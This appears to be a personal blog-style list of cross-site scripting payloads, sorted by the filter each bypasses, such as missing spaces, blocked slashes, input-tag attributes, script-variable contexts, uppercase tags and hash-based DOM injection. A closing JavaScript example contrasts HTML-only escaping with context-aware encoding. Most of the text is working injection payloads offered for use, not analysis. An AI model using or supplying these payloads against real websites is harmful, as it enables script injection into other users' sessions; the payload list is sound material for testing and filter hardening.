This is the personal list of XSS attack vectors based on various scenarios.
XSS Attack vectors
- XSS without spaces
<marquee/onstart=confirm(5)>
<svg/onload=window.onerror=alert;throw/XSS/;//
- XSS without forward slash
<BODY ONLOAD=alert('XSS')>
<video><source+onerror%3dalert()>
- XSS without forward slash inside option tag
<option value=" mydata"><input type="image" src="a" onerror="alert(123)"><""
- Inside input tag without space
<input type="text" name="origin" value="set123"oncopy="alert(123)" />
<input type="hidden" name="x" value="" style="background-image:url(http://youtube.com);"/>
<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />
- Backslash instead of forward
<input type="image" src="https:\\happyorhungry.files.wordpress.com\2011\10\cookie_monster_original.jpg>
- HTML decode before JS execution
<a href="" onclick="alert('hi');alert(/xss/)//'">click</a>
The HTML-encoded single quote is decoded to ' by the HTML parser before the JavaScript executes.
- Inside script variable declaration
<script>var a = ""/alert(123)/"";</script>
payload= "/alert(123)/"
- Capital Letters XSS
<IMG SRC=1 ONERROR=alert(1234)>
- Hash-based DOM XSS
http://victim.com/? param=";location=location.hash)//#0={};alert(0)
- No event handler XSS
"><math/href=javascript%26colon;alert%60xss%60>CLICK</math><x
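
For the "HTML decode before JS execution" entry above, an added example (not part of the original post) showing why HTML-escaping alone does not protect a value placed inside a JavaScript string in an event-handler attribute, and the context-aware encoding that does. All helper names are hypothetical, the sample input is constructed from the page's payload, and simulateClick only models the browser's entity decoding with a stubbed alert.

```javascript
// Constructed sample input, taken from the payload shown on this page.
const SAMPLE_INPUT = "hi');alert(/xss/)//";

// HTML-escape for a quoted attribute value (numeric entities).
function escapeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, c => `&#${c.charCodeAt(0)};`);
}

// Escape for a JavaScript string literal: every non-alphanumeric
// UTF-16 code unit becomes \uXXXX, so no quote can end the string.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Weak: only the outer (HTML) context is encoded.
const htmlOnly = s => escapeHtmlAttr(s);
// Hardened: inner context (JS string) first, then outer context (HTML).
const jsThenHtml = s => escapeHtmlAttr(escapeJsString(s));

// Hypothetical template that puts user input inside alert('...').
function renderLink(input, encode) {
  return `<a href="#" onclick="alert('${encode(input)}')">click</a>`;
}

// Model of what the browser does on click: decode entities in the
// attribute value, then run the result as JavaScript. alert is a stub
// that records its argument instead of showing a dialog.
function simulateClick(html) {
  const attr = html.match(/onclick="([^"]*)"/)[1];
  const js = attr.replace(/&#(\d+);/g, (_, n) => String.fromCharCode(Number(n)));
  const calls = [];
  new Function('alert', js)(msg => calls.push(String(msg)));
  return calls;
}

// Two calls: the encoded quote was decoded and closed the string early.
console.log(simulateClick(renderLink(SAMPLE_INPUT, htmlOnly)));
// One call whose argument is the input itself, treated purely as data.
console.log(simulateClick(renderLink(SAMPLE_INPUT, jsThenHtml)));
```

Keeping untrusted data out of inline event handlers entirely (for example in a data- attribute read by a script that calls addEventListener) removes the nested context altogether.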